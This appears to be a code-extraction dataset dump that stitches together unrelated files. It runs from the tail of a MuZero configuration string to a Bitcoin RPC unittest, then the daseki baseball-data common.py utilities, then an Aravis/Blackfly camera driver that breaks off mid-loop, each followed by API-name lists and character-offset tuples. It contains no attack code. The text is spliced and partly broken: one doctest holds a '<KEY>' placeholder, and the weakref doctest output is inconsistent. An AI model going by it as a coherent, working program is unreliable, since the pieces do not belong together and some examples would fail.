HIDDEN_PLANES = 16
HIDDEN_SHAPE = (BT_K, BT_K, HIDDEN_PLANES)
SUPPORT_SIZE = 1
elif GAME == "atari":
HISTORY_LENGTH = 8
BOARD_SHAPE = (HISTORY_LENGTH, 96, 96, 3)
ACTION_PLANES = 4 # breakout
ACTION_SHAPE = (ACTION_PLANES, )
HIDDEN_PLANES = 16
HIDDEN_SHAPE = (6, 6, HIDDEN_PLANES)
SUPPORT_SIZE = 300
SUPPORT_SHAPE = 2*SUPPORT_SIZE+1
# MUZERO SPECIFIC
N_UNROLL_STEPS = 5
N_TD_STEPS = 300
DISCOUNT = 0.997
WEIGHT_DECAY = 1e-4
REPLAY_BUFFER_SIZE = 5000 # SAVE THE LAST 5k GAMES
EPOCH_SIZE = 5*REPLAY_BUFFER_SIZE
BATCH_SIZE = 512
N_EPOCH = 50000
SAVE_REPLAY_BUFFER_FREQ = 64 # backup replay buffer every _ games
CHECKPOINT_FREQ = 5*EPOCH_SIZE # save model
EVALUATION_FREQ = 5*EPOCH_SIZE # evaluate model
"""
|
[
"numpy.abs",
"numpy.floor",
"numpy.zeros",
"numpy.clip",
"tensorflow.keras.losses.categorical_crossentropy",
"numpy.sign"
] |
[((1394, 1438), 'numpy.clip', 'np.clip', (['scaled', '(-support_size)', 'support_size'], {}), '(scaled, -support_size, support_size)\n', (1401, 1438), True, 'import numpy as np\n'), ((1449, 1466), 'numpy.floor', 'np.floor', (['clamped'], {}), '(clamped)\n', (1457, 1466), True, 'import numpy as np\n'), ((1541, 1580), 'numpy.zeros', 'np.zeros', ([], {'shape': '(support_size * 2 + 1,)'}), '(shape=(support_size * 2 + 1,))\n', (1549, 1580), True, 'import numpy as np\n'), ((1307, 1317), 'numpy.sign', 'np.sign', (['v'], {}), '(v)\n', (1314, 1317), True, 'import numpy as np\n'), ((2050, 2109), 'tensorflow.keras.losses.categorical_crossentropy', 'losses.categorical_crossentropy', (['y_true[:, i]', 'y_pred[:, i]'], {}), '(y_true[:, i], y_pred[:, i])\n', (2081, 2109), False, 'from tensorflow.keras import losses\n'), ((1330, 1339), 'numpy.abs', 'np.abs', (['v'], {}), '(v)\n', (1336, 1339), True, 'import numpy as np\n')]
|
from octopus.platforms.BTC.explorer import BitcoinExplorerRPC
from octopus.platforms.BTC.explorer import RPC_USER, RPC_PASSWORD, RPC_HOST
import unittest
class BitcoinExplorerTestCase(unittest.TestCase):
explorer = BitcoinExplorerRPC(host=('%s:%s@%s' % (RPC_USER, RPC_PASSWORD, RPC_HOST)))
blockhash = '00000000000000000024fb37364cbf81fd49cc2d51c09c75c35433c3a1945d04'
txid = '1b5bfc2681d40c872126919ccb1752de4cca42dcfc594899f2ef11db4b05bb39'
tx_raw = '0200000001686b654b40737f0daa1532f64e525dc925e60d075403d38cfb12ac9097764015040000006a473044022009ec3f26984906a813faae05d968ec06bf1c68883e09a00b6333126ea87d96b302201cf1d2b9165442aa178fdf772a3909c3d2ba69e454eb8660fa35df8645e3bcb60121022f2caec3ad2f3b174d048a0d46f4f6e8ba4e9d02f6bdbba64ac6817f7ac6c131ffffffff02060d0700000000001976a91407c5acae3abc91735a1471e275e33abbffada89088ac00581300000000001976a91432f2e30111e1dc45f415430ef082cb64225c538a88ac00000000'
wallet_address = '15wDxrRCn7YiCXdvqjcih6G8svrmq5AQSS'
script_hex = "76a82096b3fe1f4ec8fd076379267f72443bed81cc49c18a2913f7e1f0727f6f9f4fbf88ac"
script_asm = 'OP_DUP OP_SHA256 96b3fe1f4ec8fd076379267f72443bed81cc49c18a2913f7e1f0727f6f9f4fbf OP_EQUALVERIFY OP_CHECKSIG'
def testRPCCommand(self):
        ######################
        # HIGH-LEVEL METHODS #
        ######################
self.assertEqual(self.explorer.get_transaction(self.txid, 0), self.tx_raw)
self.assertEqual(len(self.explorer.get_block_by_hash(self.blockhash)), 18)
self.assertEqual(len(self.explorer.get_block_by_number(500000)), 18)
####################
# JSON-RPC METHODS #
####################
self.assertEqual(self.explorer.decoderawtransaction(self.tx_raw)['txid'], self.txid)
self.assertEqual(self.explorer.decodescript(self.script_hex)['asm'], self.script_asm)
self.assertEqual(len(self.explorer.getbestblockhash()), len(self.blockhash))
self.assertEqual(len(self.explorer.getblock(self.blockhash)), 18)
self.assertEqual(len(self.explorer.getblockchaininfo()), 11)
self.assertEqual(type(self.explorer.getblockcount()), int)
self.assertEqual(self.explorer.getblockhash(500000), self.blockhash)
# self.assertEqual(len(self.explorer.getchaintips()), 2)
self.assertEqual(type(self.explorer.getconnectioncount()), int)
self.assertEqual(type(self.explorer.getdifficulty()), float)
self.assertEqual(len(self.explorer.getinfo()), 16)
self.assertEqual(len(self.explorer.getmempoolinfo()), 5)
self.assertEqual(len(self.explorer.getmininginfo()), 8)
self.assertEqual(len(self.explorer.getnettotals()), 4)
self.assertEqual(type(self.explorer.getnetworkhashps()), float)
self.assertEqual(len(self.explorer.getnetworkinfo()), 13)
self.assertEqual(len(self.explorer.getpeerinfo()), 8)
self.assertEqual(type(self.explorer.getrawmempool()), list)
self.assertEqual(self.explorer.getrawtransaction(self.txid), self.tx_raw)
self.assertEqual(type(self.explorer.getreceivedbyaccount('')), float)
self.assertEqual(type(self.explorer.getreceivedbyaddress(self.wallet_address)), float)
self.assertEqual(len(self.explorer.gettxout(self.txid, 0)), 5)
self.assertEqual(len(self.explorer.gettxoutproof([self.txid])), 818)
self.assertEqual(type(self.explorer.getunconfirmedbalance()), float)
self.assertEqual(len(self.explorer.getwalletinfo()), 9)
self.assertEqual(type(self.explorer.help()), str)
self.assertEqual(len(self.explorer.validateaddress(self.wallet_address)), 6)
self.assertEqual(self.explorer.verifytxoutproof(self.explorer.gettxoutproof([self.txid])), [self.txid])
# Not tested
'''
self.explorer.abandontransaction()
self.explorer.addmultisigaddress()
self.explorer.addnode()
self.explorer.createmultisig()
self.explorer.createrawtransaction()
self.explorer.dumpprivkey()
self.explorer.encryptwallet()
self.explorer.estimatefee()
self.explorer.estimatepriority()
self.explorer.getaccountaddress()
self.explorer.getaccount()
self.explorer.getaddednodeinfo()
self.explorer.getaddressesbyaccount()
self.explorer.getbalance()
self.explorer.gettransaction()
self.explorer.keypoolrefill()
self.explorer.listaccounts()
self.explorer.listaddressgroupings()
self.explorer.listlockunspent()
self.explorer.listreceivedbyaccount()
self.explorer.listreceivedbyaddress()
self.explorer.listtransactions()
self.explorer.listunspent()
self.explorer.lockunspent()
self.explorer.prioritisetransaction()
self.explorer.sendfrom()
self.explorer.sendmany()
self.explorer.sendrawtransaction()
self.explorer.sendtoaddress()
self.explorer.settxfee()
self.explorer.signmessage()
self.explorer.signrawtransaction()
self.explorer.submitblock()
self.explorer.verifymessage()
self.explorer.walletlock()
self.explorer.walletpassphrase()
self.explorer.walletpassphrasechange()
'''
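# Illustrative note: the assertions above require a reachable bitcoind whose
# RPC credentials match RPC_USER / RPC_PASSWORD / RPC_HOST. A minimal ad-hoc
# connection for experimenting looks like (host string is hypothetical):
#   rpc = BitcoinExplorerRPC(host='user:pass@127.0.0.1:8332')
#   rpc.getblockcount()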
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(BitcoinExplorerTestCase)
unittest.TextTestRunner(verbosity=2).run(suite)
|
[
"unittest.TextTestRunner",
"octopus.platforms.BTC.explorer.BitcoinExplorerRPC",
"unittest.TestLoader"
] |
[((223, 295), 'octopus.platforms.BTC.explorer.BitcoinExplorerRPC', 'BitcoinExplorerRPC', ([], {'host': "('%s:%s@%s' % (RPC_USER, RPC_PASSWORD, RPC_HOST))"}), "(host='%s:%s@%s' % (RPC_USER, RPC_PASSWORD, RPC_HOST))\n", (241, 295), False, 'from octopus.platforms.BTC.explorer import BitcoinExplorerRPC\n'), ((5295, 5316), 'unittest.TestLoader', 'unittest.TestLoader', ([], {}), '()\n', (5314, 5316), False, 'import unittest\n'), ((5368, 5404), 'unittest.TextTestRunner', 'unittest.TextTestRunner', ([], {'verbosity': '(2)'}), '(verbosity=2)\n', (5391, 5404), False, 'import unittest\n')]
|
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Name: common.py
# Purpose: Commonly used tools across Daseki
#
# Authors: <NAME>
#
# Copyright: Copyright © 2014-16 <NAME> / cuthbertLab
# License: BSD, see license.txt
# ----------------------------------------------------------------------------
'''
Common is a collection of utility functions, objects, constants and dictionaries used
throughout daseki.
functions in common/ should not import anything from daseki except daseki.exceptionsDS
(except in tests and doctests).
For historical reasons all the (non-private) functions etc. of the common/
folder are available by importing common.
'''
# pylint: disable=wildcard-import
from typing import Any
from daseki.common.parallel import *
import enum
import inspect
import re
import os
import sys
import time
import tempfile
import weakref
from daseki.exceptionsDS import DasekiException
maxRetrosheetYear = 2015
class TeamNum(enum.IntEnum):
VISITOR = 0
HOME = 1
# tools for setup.py
def sourceFilePath():
'''
Get the Daseki directory that contains source files. This is not the same as the
outermost package development directory.
'''
dn = os.path.dirname
fpThis = inspect.getfile(sourceFilePath)
fpDS = dn(dn(fpThis))
# use retro as a test case
if 'retro' not in os.listdir(fpDS):
raise DasekiException('cannot find expected daseki directory: %s' % fpDS)
return fpDS
def dataFilePath():
return os.path.join(sourceFilePath(), 'dataFiles')
def dataRetrosheet():
return os.path.join(dataFilePath(), 'retrosheet')
def dataRetrosheetEvent():
return os.path.join(dataRetrosheet(), 'event')
def dataRetrosheetByType(gameType='regular'):
if gameType not in ('asg', 'post', 'regular'):
raise DasekiException('gameType must be asg, post, or regular, not {0}'.format(gameType))
return os.path.join(dataRetrosheetEvent(), gameType)
def gameLogFilePath():
return os.path.join(dataRetrosheet(), 'gamelog')
# ---------------------
def getDefaultRootTempDir():
'''
returns whatever tempfile.gettempdir() returns plus 'daseki'.
Creates the subdirectory if it doesn't exist:
>>> from daseki import common
>>> import tempfile
>>> t = tempfile.gettempdir()
>>> #_DOCS_SHOW t
<KEY>'
>>> import os
>>> common.getDefaultRootTempDir() == os.path.join(t, 'daseki')
True
'''
# this returns the root temp dir; this does not create a new dir
dstDir = os.path.join(tempfile.gettempdir(), 'daseki')
# if this path already exists, we have nothing more to do
if os.path.exists(dstDir):
return dstDir
else:
# make this directory as a temp directory
try:
os.mkdir(dstDir)
except OSError: # cannot make the directory
dstDir = tempfile.gettempdir()
return dstDir
# ---------------------
GAMEID_MATCH = re.compile(r'([A-Za-z][A-Za-z][A-Za-z])(\d\d\d\d)(\d\d)(\d\d)(\d?)')
class GameId(object):
'''
A GameId is a 12-character string that embeds information about
when and where a game was played. It is designed to uniquely identify
any game every played.
We can initialize a GameId object from a string:
>>> from daseki import common
>>> gid = common.GameId('SDN201304090')
>>> str(gid)
'SDN201304090'
>>> gid
<daseki.common.GameId SDN201304090>
>>> gid.year
2013
>>> gid.day
9
>>> gid.gameNum # always a string because of weird split double header A, B codes
'0'
>>> gid.homeTeam
'SDN'
Or we can construct the id from all the information:
>>> gid2 = common.GameId()
>>> gid2.homeTeam = 'ARI'
>>> gid2.year = 2000
>>> gid2.month = 9
>>> gid2.day = 22
>>> print(gid2)
ARI200009220
Last digit is optional:
>>> gid = common.GameId('SDN20130409')
>>> str(gid)
'SDN201304090'
'''
def __init__(self, gameId=None):
self.gameId = gameId
self.year = 0
self.month = 0
self.day = 0
self.gameNum = '0'
self.homeTeam = 'XXX'
if gameId is not None:
self.parse()
def __repr__(self):
return '<{0}.{1} {2}>'.format(self.__module__, self.__class__.__name__, str(self))
def __str__(self):
return '{s.homeTeam}{s.year:4d}{s.month:02d}{s.day:02d}{s.gameNum}'.format(s=self)
def parse(self):
gameId = self.gameId
matched = GAMEID_MATCH.match(gameId)
if not matched:
raise DasekiException('invalid gameId: %s' % gameId)
self.homeTeam = matched.group(1).upper()
self.year = int(matched.group(2))
self.month = int(matched.group(3))
self.day = int(matched.group(4))
self.gameNum = matched.group(5)
if self.gameNum == '':
self.gameNum = '0'
# ---------------------
ordinals = ['Zeroth', 'First', 'Second', 'Third', 'Fourth', 'Fifth',
'Sixth', 'Seventh', 'Eighth', 'Ninth', 'Tenth', 'Eleventh',
'Twelfth', 'Thirteenth', 'Fourteenth', 'Fifteenth',
'Sixteenth', 'Seventeenth', 'Eighteenth', 'Nineteenth',
'Twentieth', 'Twenty-first', 'Twenty-second']
def ordinalAbbreviation(value, plural=False):
'''Return the ordinal abbreviations for integers
>>> from daseki import common
>>> common.ordinalAbbreviation(3)
'rd'
>>> common.ordinalAbbreviation(255)
'th'
>>> common.ordinalAbbreviation(255, plural=True)
'ths'
:rtype: str
'''
valueHundreths = value % 100
post = ''
if valueHundreths in [11, 12, 13]:
post = 'th'
else:
valueMod = value % 10
if valueMod == 1:
post = 'st'
elif valueMod in [0, 4, 5, 6, 7, 8, 9]:
post = 'th'
elif valueMod == 2:
post = 'nd'
elif valueMod == 3:
post = 'rd'
if post != 'st' and plural:
post += 's'
return post
# -------------------------------------------------------------------------------
class Timer(object):
'''
An object for timing. Call it to get the current time since starting.
>>> from daseki import common
>>> t = common.Timer()
>>> now = t()
>>> now_now = t()
>>> now_now > now
True
Call `stop` to stop it. Calling `start` again will reset the number
>>> t.stop()
>>> stopTime = t()
>>> stopNow = t()
>>> stopTime == stopNow
True
All this had better take less than one second!
>>> stopTime < 1
True
'''
def __init__(self):
# start on init
self._tStart = time.time()
self._tDif = 0
self._tStop = None
def start(self):
'''
Explicit start method; will clear previous values.
Start always happens on initialization.
'''
self._tStart = time.time()
self._tStop = None # show that a new run has started so __call__ works
self._tDif = 0
def stop(self):
self._tStop = time.time()
self._tDif = self._tStop - self._tStart
def clear(self):
self._tStop = None
self._tDif = 0
self._tStart = None
def __call__(self):
'''Reports current time or, if stopped, stopped time.
'''
# if stopped, gets _tDif; if not stopped, gets current time
if self._tStop is None: # if not stopped yet
t = time.time() - self._tStart
else:
t = self._tDif
return t
def __str__(self):
if self._tStop is None: # if not stopped yet
t = time.time() - self._tStart
else:
t = self._tDif
return str(round(t, 3))
# ---------
def sortModules(moduleList):
'''
    Sort a list of imported modules such that the most recently modified is
    first. Ties are broken by last access time, then by module name.
Will return a different order each time depending on the last mod time
:rtype: list(str)
'''
sort = []
modNameToMod = {}
for mod in moduleList:
modNameToMod[mod.__name__] = mod
fp = mod.__file__ # returns the pyc file
stat = os.stat(fp)
lastmod = time.localtime(stat[8])
asctime = time.asctime(lastmod)
sort.append((lastmod, asctime, mod.__name__))
sort.sort()
sort.reverse()
# just return module list
return [modNameToMod[modName] for lastmod, asctime, modName in sort]
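# Usage sketch (illustrative): order already-imported modules by source-file
# modification time, most recent first.
#   import daseki.common, daseki.exceptionsDS
#   recent_first = sortModules([daseki.common, daseki.exceptionsDS])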
# ------------------------
class SlottedObjectMixin(object):
r'''
Provides template for classes implementing slots allowing it to be pickled
properly.
Only use SlottedObjects for objects that we expect to make so many of
that memory storage and speed become an issue. For instance an object representing
    a single play or plate appearance.
>>> import pickle
>>> from daseki import common
>>> class BatAngle(common.SlottedObjectMixin):
... __slots__ = ('horizontal', 'vertical')
>>> s = BatAngle()
>>> s.horizontal = 35
>>> s.vertical = 20
>>> #_DOCS_SHOW out = pickle.dumps(s)
>>> #_DOCS_SHOW t = pickle.loads(out)
>>> t = s #_DOCS_HIDE -- cannot define classes for pickling in doctests
>>> t.horizontal, t.vertical
(35, 20)
'''
# CLASS VARIABLES #
    __slots__ = ('__weakref__',)
# SPECIAL METHODS #
def __getstate__(self):
if getattr(self, '__dict__', None) is not None:
state = getattr(self, '__dict__').copy()
else:
state = {}
slots = set()
for cls in self.__class__.mro():
slots.update(getattr(cls, '__slots__', ()))
for slot in slots:
sValue = getattr(self, slot, None)
if isinstance(sValue, weakref.ref):
sValue = sValue()
print('Warning: uncaught weakref found in %r - %s, will not be rewrapped' %
(self, slot))
state[slot] = sValue
if getattr(self, '__dict__', None) is not None:
print('We got a dict TOO!', getattr(self, '__class__'))
return state
def __setstate__(self, state):
# print('Restoring state {0}'.format(self.__class__))
for slot, value in state.items():
setattr(self, slot, value)
class ParentMixin(SlottedObjectMixin):
__slots__ = ('_parent',)
def __init__(self, parent=None):
self._parent = None
if parent is not None:
self.parent = parent
def __getstate__(self):
pValue = getattr(self, '_parent', None)
setattr(self, '_parent', None)
state = super().__getstate__()
state['_parent'] = pValue
return state
def __setstate__(self, state):
super().__setstate__(state)
pValue = getattr(self, '_parent', None)
try:
pValue = weakref.ref(pValue)
except TypeError:
pass # hard reference now...
setattr(self, '_parent', pValue)
def parentByClass(self, className):
'''
iterate through parents until one of the proper class is found.
'''
p = self.parent
if p is None:
return None
if p.__class__.__name__ == className:
return p
elif hasattr(p, 'parentByClass'):
return p.parentByClass(className)
else:
return None
def _getParent(self):
_p = self._parent
if _p is None:
return _p
elif isinstance(_p, weakref.ref):
return _p()
else:
return _p
def _setParent(self, referent):
if referent is None:
return
try:
self._parent = weakref.ref(referent)
# if referent is None, will raise a TypeError
# if referent is a weakref, will also raise a TypeError
# will also raise a type error for string, ints, etc.
# slight performance boost rather than checking if None
except TypeError:
self._parent = referent
parent = property(_getParent, _setParent)
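# Illustrative (hypothetical classes, not part of daseki): ParentMixin stores
# only a weak reference to the parent, so children do not create reference
# cycles with the object that owns them.
#   class Game(object):
#       pass
#   class HalfInning(ParentMixin):
#       __slots__ = ()
#   g = Game()
#   h = HalfInning(parent=g)
#   h.parent is g    # True while g is alive; only a weakref is stored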
# ------------------------------------------------------------------------------
def wrapWeakref(referent):
'''
utility function that wraps objects as weakrefs but does not wrap
already wrapped objects; also prevents wrapping the unwrapable 'None' type, etc.
>>> import weakref
>>> from daseki import common
>>> class Mock(object):
... pass
>>> a1 = Mock()
>>> ref1 = common.wrapWeakref(a1)
>>> ref1
<weakref at 0x101f29ae8; to 'Mock' at 0x101e45358>
>>> ref2 = common.wrapWeakref(ref1)
>>> ref2
<weakref at 0x101f299af; to 'Mock' at 0x101e45358>
>>> ref3 = common.wrapWeakref(5)
>>> ref3
5
'''
# if type(referent) is weakref.ref:
# if isinstance(referent, weakref.ref):
# return referent
try:
return weakref.ref(referent)
# if referent is None, will raise a TypeError
# if referent is a weakref, will also raise a TypeError
# will also raise a type error for string, ints, etc.
# slight performance boost rather than checking if None
except TypeError:
return referent
def unwrapWeakref(referent):
'''
Utility function that gets an object that might be an object itself
    or a weak reference to an object. It returns referent() if it's a weakref
    (or another callable) and referent if it's not.
>>> from daseki import common
>>> class Mock(object):
... strong: Any
... weak: Any
>>> a1 = Mock()
>>> a2 = Mock()
>>> a2.strong = a1
>>> a2.weak = common.wrapWeakref(a1)
>>> common.unwrapWeakref(a2.strong) is a1
True
>>> common.unwrapWeakref(a2.weak) is a1
True
>>> common.unwrapWeakref(a2.strong) is common.unwrapWeakref(a2.weak)
True
'''
try:
return referent()
except TypeError:
return referent
def warn(*msg):
'''
To print a warning to the user, send a list of strings to this method.
Similar to printDebug but even if debug is off.
'''
msg = formatStr(msg)
sys.stderr.write(msg)
def formatStr(msg, *arguments, **keywords):
'''Format one or more data elements into string suitable for printing
straight to stderr or other outputs
>>> from daseki import common
>>> a = common.formatStr('test', '1', 2, 3)
>>> print(a)
test 1 2 3
<BLANKLINE>
'''
if 'format' in keywords:
formatType = keywords['format']
else:
formatType = None
msg = [msg] + list(arguments)
for i in range(len(msg)):
x = msg[i]
        if isinstance(x, bytes):
            msg[i] = x.decode('utf-8')
        elif not isinstance(x, str):
try:
msg[i] = repr(x)
except TypeError:
try:
msg[i] = x.decode('utf-8')
except AttributeError:
msg[i] = '<__repr__ failed for ' + x.__class__.__name__ + '>'
except AttributeError: # or something
msg[i] = '<__repr__ failed for ' + x.__class__.__name__ + '>'
if formatType == 'block':
return '\n*** '.join(msg)+'\n'
else: # catch all others
return ' '.join(msg)+'\n'
if __name__ == '__main__':
import daseki
daseki.mainTest()
|
[
"time.asctime",
"os.mkdir",
"os.stat",
"daseki.mainTest",
"daseki.exceptionsDS.DasekiException",
"tempfile.gettempdir",
"os.path.exists",
"time.time",
"inspect.getfile",
"sys.stderr.write",
"weakref.ref",
"os.listdir",
"time.localtime",
"re.compile"
] |
[((3001, 3077), 're.compile', 're.compile', (['"""([A-Za-z][A-Za-z][A-Za-z])(\\\\d\\\\d\\\\d\\\\d)(\\\\d\\\\d)(\\\\d\\\\d)(\\\\d?)"""'], {}), "('([A-Za-z][A-Za-z][A-Za-z])(\\\\d\\\\d\\\\d\\\\d)(\\\\d\\\\d)(\\\\d\\\\d)(\\\\d?)')\n", (3011, 3077), False, 'import re\n'), ((1293, 1324), 'inspect.getfile', 'inspect.getfile', (['sourceFilePath'], {}), '(sourceFilePath)\n', (1308, 1324), False, 'import inspect\n'), ((2694, 2716), 'os.path.exists', 'os.path.exists', (['dstDir'], {}), '(dstDir)\n', (2708, 2716), False, 'import os\n'), ((14199, 14220), 'sys.stderr.write', 'sys.stderr.write', (['msg'], {}), '(msg)\n', (14215, 14220), False, 'import sys\n'), ((15399, 15416), 'daseki.mainTest', 'daseki.mainTest', ([], {}), '()\n', (15414, 15416), False, 'import daseki\n'), ((1404, 1420), 'os.listdir', 'os.listdir', (['fpDS'], {}), '(fpDS)\n', (1414, 1420), False, 'import os\n'), ((1436, 1503), 'daseki.exceptionsDS.DasekiException', 'DasekiException', (["('cannot find expected daseki directory: %s' % fpDS)"], {}), "('cannot find expected daseki directory: %s' % fpDS)\n", (1451, 1503), False, 'from daseki.exceptionsDS import DasekiException\n'), ((2592, 2613), 'tempfile.gettempdir', 'tempfile.gettempdir', ([], {}), '()\n', (2611, 2613), False, 'import tempfile\n'), ((6724, 6735), 'time.time', 'time.time', ([], {}), '()\n', (6733, 6735), False, 'import time\n'), ((6962, 6973), 'time.time', 'time.time', ([], {}), '()\n', (6971, 6973), False, 'import time\n'), ((7120, 7131), 'time.time', 'time.time', ([], {}), '()\n', (7129, 7131), False, 'import time\n'), ((8263, 8274), 'os.stat', 'os.stat', (['fp'], {}), '(fp)\n', (8270, 8274), False, 'import os\n'), ((8293, 8316), 'time.localtime', 'time.localtime', (['stat[8]'], {}), '(stat[8])\n', (8307, 8316), False, 'import time\n'), ((8335, 8356), 'time.asctime', 'time.asctime', (['lastmod'], {}), '(lastmod)\n', (8347, 8356), False, 'import time\n'), ((12989, 13010), 'weakref.ref', 'weakref.ref', (['referent'], {}), '(referent)\n', (13000, 13010), False, 'import weakref\n'), ((2825, 2841), 'os.mkdir', 'os.mkdir', (['dstDir'], {}), '(dstDir)\n', (2833, 2841), False, 'import os\n'), ((4626, 4672), 'daseki.exceptionsDS.DasekiException', 'DasekiException', (["('invalid gameId: %s' % gameId)"], {}), "('invalid gameId: %s' % gameId)\n", (4641, 4672), False, 'from daseki.exceptionsDS import DasekiException\n'), ((10943, 10962), 'weakref.ref', 'weakref.ref', (['pValue'], {}), '(pValue)\n', (10954, 10962), False, 'import weakref\n'), ((11797, 11818), 'weakref.ref', 'weakref.ref', (['referent'], {}), '(referent)\n', (11808, 11818), False, 'import weakref\n'), ((2916, 2937), 'tempfile.gettempdir', 'tempfile.gettempdir', ([], {}), '()\n', (2935, 2937), False, 'import tempfile\n'), ((7517, 7528), 'time.time', 'time.time', ([], {}), '()\n', (7526, 7528), False, 'import time\n'), ((7696, 7707), 'time.time', 'time.time', ([], {}), '()\n', (7705, 7707), False, 'import time\n')]
|
#!/usr/bin/env python3
"""
Python3 class to work with Aravis/GenICam cameras, subclass of sdss-basecam.
.. module:: araviscam
.. moduleauthor:: <NAME> <<EMAIL>>
"""
import sys
import math
import asyncio
import numpy
import astropy
from basecam.mixins import ImageAreaMixIn
from basecam import (
CameraSystem,
BaseCamera,
CameraEvent,
CameraConnectionError,
models,
ExposureError,
)
from lvmcam.actor import modules
# Since the aravis wrapper for GenICam cameras (such as the Blackfly)
# is using glib2 GObjects to represent cameras and streams, the
# PyGObject module allows to call the C functions of aravis in python.
# https://pygobject.readthedocs.io/en/latest/
from lvmcam.araviscam.aravis import Aravis
import basecam.models.card as card
from lvmcam.actor.commands import expose
# https://pypi.org/project/sdss-basecam/
# https://github.com/sdss/basecam/
# from sdsstools import read_yaml_file
__all__ = ["BlackflyCameraSystem", "BlackflyCamera", "BlackflyImageAreaMixIn"]
class BlackflyCameraSystem(CameraSystem):
"""A collection of GenICam cameras, possibly online
:param camera_class : `.BaseCamera` subclass
The subclass of `.BaseCamera` to use with this camera system.
:param camera_config :
A dictionary with the configuration parameters for the multiple
cameras that can be present in the system, or the path to a YAML file.
Refer to the documentation for details on the accepted format.
:type camera_config : dict or path
:param include : List of camera UIDs that can be connected.
:type include : list
:param exclude : list
List of camera UIDs that will be ignored.
:param logger : ~logging.Logger
The logger instance to use. If `None`, a new logger will be created.
:param log_header : A string to be prefixed to each message logged.
:type log_header : str
:param log_file : The path to which to log.
:type log_file : str
:param verbose : Whether to log to stdout.
:type verbose : bool
    :param ip_list: A list of IP addresses to be checked/pinged.
:type ip_list: List of strings.
"""
__version__ = "0.0.301"
# A list of ip addresses in the usual "xxx.yyy.zzz.ttt" or "name.subnet.net"
# format that have been added manually/explicitly and may not be found by the
    # usual broadcast auto-detection (i.e., possibly on some other global network).
ips_nonlocal = []
def __init__(
self,
camera_class=None,
camera_config=None,
include=None,
exclude=None,
logger=None,
log_header=None,
log_file=None,
verbose=False,
ip_list=None,
):
super().__init__(
camera_class=camera_class,
camera_config=camera_config,
include=include,
exclude=exclude,
logger=logger,
log_header=log_header,
log_file=log_file,
verbose=verbose,
)
# If the ctor is fed with an explicit list of IP addresses, add them to
# the scanner (with delayed inspection in list_available_cameras).
if ip_list is not None:
self.ips_nonlocal.extend(ip_list)
        # debugging: print yaml configuration
# print(self._config)
# @modules.timeit
def list_available_cameras(self):
"""Gather serial numbers of online Aravis/Genicam devices.
:return: a list of serial numbers (as strings). This list may be
empty if no cameras are online/switched on.
For cameras explicitly addressed by IP, the serial
numbers have the format sn@ip, with an @ between number and address.
:rtype: list
.. todo:: optionally implement a specific filter for Blackfly's if Basler
cameras should not be listed.
"""
# Start with (pessimistic) initially empty set of online devices
serialNums = []
addrs = []
# Broadcast ethernet/bus for recognized cameras.
# Warning/todo: this gathers also cameras that are not of the Blackfly class,
# and in conjunction with the SDSS may also recognize the Basler cameras..
Aravis.update_device_list()
Ndev = Aravis.get_n_devices()
# print(str(Ndev) + " cameras online")
# get_device_id returns a string of type, SN, MAC etc
for i in range(Ndev):
cam = Aravis.Camera.new(Aravis.get_device_id(i))
uid = cam.get_string("DeviceSerialNumber")
serialNums.append(uid)
addrs.append("")
# Try to ping cameras explicitly proposed with ctor.
for ip in self.ips_nonlocal:
try:
cam = Aravis.Camera.new(ip)
uid = cam.get_string("DeviceSerialNumber")
                # If this was already in the scan: discard, else add
if uid not in serialNums:
serialNums.append(uid)
addrs.append("@" + ip)
except:
# apparently no such camera at this address....
pass
# we zip the two lists to the format 'serialnumber{@ip}'
ids = []
for cam in range(len(serialNums)):
ids.append(serialNums[cam] + addrs[cam])
return ids
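# Usage sketch (illustrative; the IP is hypothetical): scanning local cameras
# plus one explicit address yields ids like '21234567@192.168.70.50'.
#   cs = BlackflyCameraSystem(BlackflyCamera, ip_list=['192.168.70.50'])
#   print(cs.list_available_cameras())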
from basecam.models.builtin import basic_fz_fits_model
class BlackflyCamera(BaseCamera):
"""A FLIR (formerly Point Grey Research) Blackfly camera.
Given the pixel scale on the benches of LVMi and the assumption
of 9 um pixel sizes of the LVMi cameras, we assume that the
    cameras have roughly 1 arcsec per pixel, so they are used without binning.
In addition we let the camera flip the standard image orientation of the data
values assuming that values are stored into a FITS interface (where
the first values in the sequential data are the bottom row).
So this is not done in this python code but by the camera.
"""
# fits_model=basic_fz_fits_model
def __init__(
self,
uid,
camera_system,
name=None,
force=False,
image_namer=None,
camera_params={},
):
super().__init__(
uid=uid,
camera_system=camera_system,
name=name,
force=force,
image_namer=image_namer,
camera_params=camera_params,
)
self.header = []
@modules.atimeit
async def _connect_internal(self, **kwargs):
"""Connect to a camera and upload basic binning and ROI parameters.
:param kwargs: recognizes the key uid with integer value, the serial number
If the key uid is absent, tries to attach to the first camera.
        This is a subdictionary of 'cameras' in practice.
"""
# print(self.name)
# search for an optional uid key in the arguments
try:
uid = kwargs["uid"]
except:
uid = None
# reverse lookup of the uid in the list of known cameras
cs = BlackflyCameraSystem(BlackflyCamera)
slist = cs.list_available_cameras()
if uid is None:
# uid was not specified: grab the first device that is found
# print("no uid provided, attaching to first camera")
idx = 0
else:
# print("searching " + uid + " in " + str(slist) )
idx = -1
for id in slist:
# remove the optional ip address of the id
slistuid = id.split("@")[0]
if slistuid == uid:
idx = slist.index(id)
# not found
if idx < 0:
raise CameraConnectionError("SN " + uid + " not connected")
cam = None
try:
if "@" in slist[idx]:
# if the camera was not on local network use the address part
cam = Aravis.Camera.new(slist[idx].split("@")[1])
else:
# otherwise the index is the same as the search order...
cam = Aravis.Camera.new(Aravis.get_device_id(idx))
except:
raise CameraConnectionError(" not connected")
# search for an optional gain key in the arguments
# todo: one could interpret gain=0 here as to call set_gain_auto(ARV_AUTO_ON)
try:
gain = kwargs["gain"]
if gain > 0.0:
# todo: it might make sense to squeeze this into the minimum
# and maximum range of the camera's gain if outside that range.
                # operate on the local cam handle; self.device is only set at the end
                cam.set_gain_auto(0)
cam.set_gain(gain)
except Exception as ex:
# print("failed to set gain " + str(ex))
pass
# see arvenums.h for the list of pixel formats. This is MONO_16 here, always
cam.set_pixel_format(0x01100007)
# search for an optional x and y binning factor
try:
var = kwargs["binning"]
cam.set_binning(var[0], var[1])
except Exception as ex:
# print("failed to set binning " + str(ex))
# horizontal and vertical binning set to 1
cam.set_binning(1, 1)
# scan the general list of genicam featured values
# of the four native types
for typp, arvLst in kwargs.items():
if arvLst is not None:
if typp == "bool":
for genkey, genval in arvLst.items():
try:
cam.set_boolean(genkey, int(genval))
except:
# probably a typo in the yaml file... todo: log this
